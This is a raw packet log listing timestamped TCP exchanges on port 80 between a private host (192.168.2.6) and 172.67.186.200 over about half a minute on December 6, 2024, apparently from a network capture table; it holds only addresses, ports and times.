Dec 6, 2024 03:14:25.513848066 CET	50084	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:25.515163898 CET	50086	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:25.633845091 CET	80	50084	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:25.633893967 CET	50084	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:25.634835958 CET	80	50086	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:25.634893894 CET	50086	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:25.762134075 CET	50087	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:25.883362055 CET	80	50087	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:25.883460999 CET	50087	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:25.883625031 CET	50087	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:26.003264904 CET	80	50087	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:26.233683109 CET	50087	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:26.353547096 CET	80	50087	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:26.865683079 CET	50088	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:26.967984915 CET	80	50087	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:26.985570908 CET	80	50088	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:26.985635996 CET	50088	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:26.985938072 CET	50088	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:27.014127016 CET	50087	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:27.105945110 CET	80	50088	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:27.242645979 CET	80	50087	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:27.295366049 CET	50087	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:27.343214035 CET	50088	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:27.436570883 CET	80	50087	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:27.462937117 CET	80	50088	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:27.462948084 CET	80	50088	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:27.482907057 CET	50087	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:27.563666105 CET	50083	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:27.563807011 CET	50086	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:27.567445993 CET	50087	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:27.568445921 CET	50089	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:27.687400103 CET	80	50087	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:27.687446117 CET	50087	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:27.688092947 CET	80	50089	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:27.688152075 CET	50089	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:27.688312054 CET	50089	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:27.807945013 CET	80	50089	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:28.045783997 CET	50089	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:28.081587076 CET	80	50088	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:28.125679970 CET	50088	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:28.165596962 CET	80	50089	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:28.319689035 CET	80	50088	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:28.373505116 CET	50088	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:28.774559021 CET	80	50089	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:28.826623917 CET	50089	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:29.007745981 CET	80	50089	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:29.060981989 CET	50089	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:29.140543938 CET	50088	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:29.140659094 CET	50089	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:29.141731024 CET	50090	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:29.260704994 CET	80	50088	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:29.260754108 CET	50088	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:29.261085987 CET	80	50089	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:29.261127949 CET	50089	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:29.261466980 CET	80	50090	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:29.261526108 CET	50090	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:29.261704922 CET	50090	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:29.381390095 CET	80	50090	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:29.608478069 CET	50090	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:29.728432894 CET	80	50090	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:30.383413076 CET	80	50090	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:30.437676907 CET	50090	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:30.646032095 CET	80	50090	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:30.733674049 CET	50090	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:30.761552095 CET	50090	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:30.762624025 CET	50091	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:30.881639957 CET	80	50090	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:30.881740093 CET	50090	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:30.882299900 CET	80	50091	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:30.882386923 CET	50091	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:30.885674000 CET	50091	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:31.005688906 CET	80	50091	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:31.232979059 CET	50091	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:31.352890968 CET	80	50091	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:31.986612082 CET	80	50091	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:32.029840946 CET	50091	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:32.219866991 CET	80	50091	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:32.265674114 CET	50091	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:32.341672897 CET	50091	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:32.367495060 CET	50092	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:32.461889029 CET	80	50091	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:32.465850115 CET	50091	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:32.487337112 CET	80	50092	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:32.489763975 CET	50092	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:32.493675947 CET	50092	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:32.613485098 CET	80	50092	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:32.842318058 CET	50092	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:32.963037968 CET	80	50092	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:33.327955961 CET	50092	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:33.328619003 CET	50093	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:33.448126078 CET	80	50092	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:33.448194027 CET	50092	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:33.448275089 CET	80	50093	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:33.448335886 CET	50093	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:33.448458910 CET	50093	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:33.452543020 CET	50094	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:33.568161964 CET	80	50093	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:33.572221041 CET	80	50094	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:33.572285891 CET	50094	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:33.572516918 CET	50094	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:33.692224979 CET	80	50094	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:33.795489073 CET	50093	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:33.915499926 CET	80	50093	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:33.915515900 CET	80	50093	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:33.920573950 CET	50094	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:34.040508986 CET	80	50094	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:34.553003073 CET	80	50093	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:34.641665936 CET	50093	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:34.672498941 CET	80	50094	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:34.717677116 CET	50094	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:34.877453089 CET	80	50093	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:34.933729887 CET	50093	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:34.933765888 CET	80	50094	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:34.982844114 CET	50094	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:35.060403109 CET	50093	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:35.060529947 CET	50094	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:35.180692911 CET	80	50093	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:35.180749893 CET	50093	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:35.181075096 CET	80	50094	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:35.181122065 CET	50094	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:35.191205025 CET	50095	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:35.310925007 CET	80	50095	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:35.311002970 CET	50095	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:35.311636925 CET	50095	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:35.431410074 CET	80	50095	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:35.670435905 CET	50095	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:35.791354895 CET	80	50095	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:36.475691080 CET	80	50095	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:36.641657114 CET	50095	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:36.770016909 CET	80	50095	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:36.829668045 CET	50095	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:36.905663013 CET	50095	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:36.905667067 CET	50096	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:37.025537014 CET	80	50096	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:37.025605917 CET	50096	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:37.025820017 CET	80	50095	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:37.025826931 CET	50096	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:37.025865078 CET	50095	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:37.146964073 CET	80	50096	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:37.373631001 CET	50096	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:37.493486881 CET	80	50096	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:38.114626884 CET	80	50096	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:38.233660936 CET	50096	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:38.360059023 CET	80	50096	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:38.435975075 CET	50096	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:38.552189112 CET	80	50096	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:38.625654936 CET	50096	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:38.669662952 CET	50097	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:38.789479971 CET	80	50097	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:38.789589882 CET	50097	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:38.793656111 CET	50097	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:38.913443089 CET	80	50097	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:39.139208078 CET	50097	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:39.259206057 CET	80	50097	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:39.876593113 CET	80	50097	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:39.891237974 CET	50098	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:39.891568899 CET	50097	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:40.011168003 CET	80	50098	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:40.011226892 CET	50099	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:40.011563063 CET	80	50097	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:40.011775970 CET	50097	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:40.011780024 CET	50098	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:40.011869907 CET	50098	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:40.130940914 CET	80	50099	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:40.131541014 CET	80	50098	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:40.131680012 CET	50099	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:40.131815910 CET	50099	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:40.251518011 CET	80	50099	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:40.358077049 CET	50098	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:40.477972984 CET	80	50098	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:40.477989912 CET	80	50098	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:40.485650063 CET	50099	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:40.605484009 CET	80	50099	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:41.098005056 CET	80	50098	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:41.139077902 CET	50098	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:41.218131065 CET	80	50099	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:41.264100075 CET	50099	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:41.365096092 CET	80	50098	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:41.420346975 CET	50098	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:41.486197948 CET	80	50099	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:41.529706001 CET	50099	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:41.678668976 CET	50098	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:41.678872108 CET	50099	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:41.679681063 CET	50100	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:41.798810959 CET	80	50098	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:41.798862934 CET	50098	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:41.799117088 CET	80	50099	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:41.799164057 CET	50099	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:41.799365997 CET	80	50100	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:41.799439907 CET	50100	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:41.799694061 CET	50100	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:41.919426918 CET	80	50100	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:42.154834986 CET	50100	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:42.274638891 CET	80	50100	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:42.990312099 CET	80	50100	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:43.029706955 CET	50100	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:43.287653923 CET	80	50100	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:43.342190027 CET	50100	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:43.400412083 CET	50003	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:43.400541067 CET	50096	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:43.406203032 CET	50101	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:43.525954008 CET	80	50101	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:43.526082039 CET	50101	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:43.526161909 CET	50101	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:43.645844936 CET	80	50101	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:43.873593092 CET	50101	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:43.993567944 CET	80	50101	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:44.702387094 CET	80	50101	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:44.749636889 CET	50101	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:44.972028017 CET	80	50101	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:45.014117956 CET	50101	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:45.103336096 CET	50101	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:45.104547977 CET	50102	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:45.224940062 CET	80	50101	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:45.224988937 CET	50101	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:45.225188017 CET	80	50102	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:45.225259066 CET	50102	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:45.225433111 CET	50102	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:45.345092058 CET	80	50102	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:45.576672077 CET	50102	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:45.696631908 CET	80	50102	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:46.322055101 CET	80	50102	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:46.373457909 CET	50102	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:46.407418013 CET	50103	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:46.409631968 CET	50102	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:46.527251959 CET	80	50103	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:46.529644012 CET	80	50102	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:46.529752016 CET	50102	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:46.529762983 CET	50103	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:46.530282021 CET	50103	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:46.573663950 CET	50104	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:46.649956942 CET	80	50103	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:46.693466902 CET	80	50104	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:46.693706989 CET	50104	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:46.693865061 CET	50104	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:46.813568115 CET	80	50104	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:46.889159918 CET	50103	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:47.010025024 CET	80	50103	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:47.010044098 CET	80	50103	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:47.045398951 CET	50104	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:47.166582108 CET	80	50104	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:47.616408110 CET	80	50103	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:47.670320988 CET	50103	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:47.779778957 CET	80	50104	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:47.826607943 CET	50104	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:47.883711100 CET	80	50103	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:47.935952902 CET	50103	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:48.041635990 CET	80	50104	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:48.093631983 CET	50104	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:48.234414101 CET	80	50104	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:48.279696941 CET	50104	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:48.353652954 CET	50103	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:48.353801012 CET	50104	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:48.354271889 CET	50105	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:48.473767042 CET	80	50103	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:48.473972082 CET	80	50105	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:48.474072933 CET	50105	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:48.474076986 CET	50103	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:48.474216938 CET	80	50104	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:48.474318027 CET	50105	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:48.474380016 CET	50104	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:48.594068050 CET	80	50105	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:48.829629898 CET	50105	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:48.949487925 CET	80	50105	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:49.561439991 CET	80	50105	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:49.607805967 CET	50105	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:49.807430983 CET	80	50105	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:49.857937098 CET	50105	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:49.999257088 CET	80	50105	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:50.005626917 CET	50105	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:50.121638060 CET	50106	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:50.125900030 CET	80	50105	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:50.129622936 CET	50105	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:50.241575956 CET	80	50106	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:50.241705894 CET	50106	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:50.245623112 CET	50106	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:50.366815090 CET	80	50106	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:50.593630075 CET	50106	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:50.713538885 CET	80	50106	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:51.335412025 CET	80	50106	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:51.389086008 CET	50106	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:51.575428963 CET	80	50106	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:51.622816086 CET	50106	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:51.701189041 CET	50106	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:51.702621937 CET	50107	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:51.821398973 CET	80	50106	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:51.821479082 CET	50106	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:51.822362900 CET	80	50107	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:51.822429895 CET	50107	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:51.822628021 CET	50107	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:51.944233894 CET	80	50107	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:52.171781063 CET	50107	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:52.291763067 CET	80	50107	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:52.889867067 CET	50107	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:52.891655922 CET	50108	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:52.946060896 CET	80	50107	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:52.946188927 CET	50107	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:53.010166883 CET	80	50107	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:53.010227919 CET	50107	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:53.011360884 CET	80	50108	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:53.011451960 CET	50108	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:53.011579037 CET	50108	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:53.019923925 CET	50109	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:53.131262064 CET	80	50108	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:53.139663935 CET	80	50109	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:53.139734983 CET	50109	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:53.139906883 CET	50109	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:53.259566069 CET	80	50109	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:53.357965946 CET	50108	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:53.477850914 CET	80	50108	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:53.477874041 CET	80	50108	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:53.498496056 CET	50109	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:53.618468046 CET	80	50109	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:54.096951008 CET	80	50108	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:54.141614914 CET	50108	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:54.225871086 CET	80	50109	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:54.280853987 CET	50109	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:54.361814976 CET	80	50108	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:54.421612024 CET	50108	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:54.475308895 CET	80	50109	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:54.529678106 CET	50109	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:54.588267088 CET	50109	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:54.588268995 CET	50108	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:54.589031935 CET	50110	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:54.708245993 CET	80	50109	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:54.708478928 CET	80	50108	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:54.708690882 CET	80	50110	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:54.709662914 CET	50109	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:54.709664106 CET	50108	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:54.709835052 CET	50110	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:54.713608980 CET	50110	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:54.833410025 CET	80	50110	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:55.061069965 CET	50110	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:55.181040049 CET	80	50110	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:55.796034098 CET	80	50110	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:55.842169046 CET	50110	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:56.031579018 CET	80	50110	172.67.186.200	192.168.2.6
Dec 6, 2024 03:14:56.077608109 CET	50110	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:56.153614044 CET	50111	80	192.168.2.6	172.67.186.200
Dec 6, 2024 03:14:56.273627043 CET	80	50111	172.67.186.200	192.168.2.6
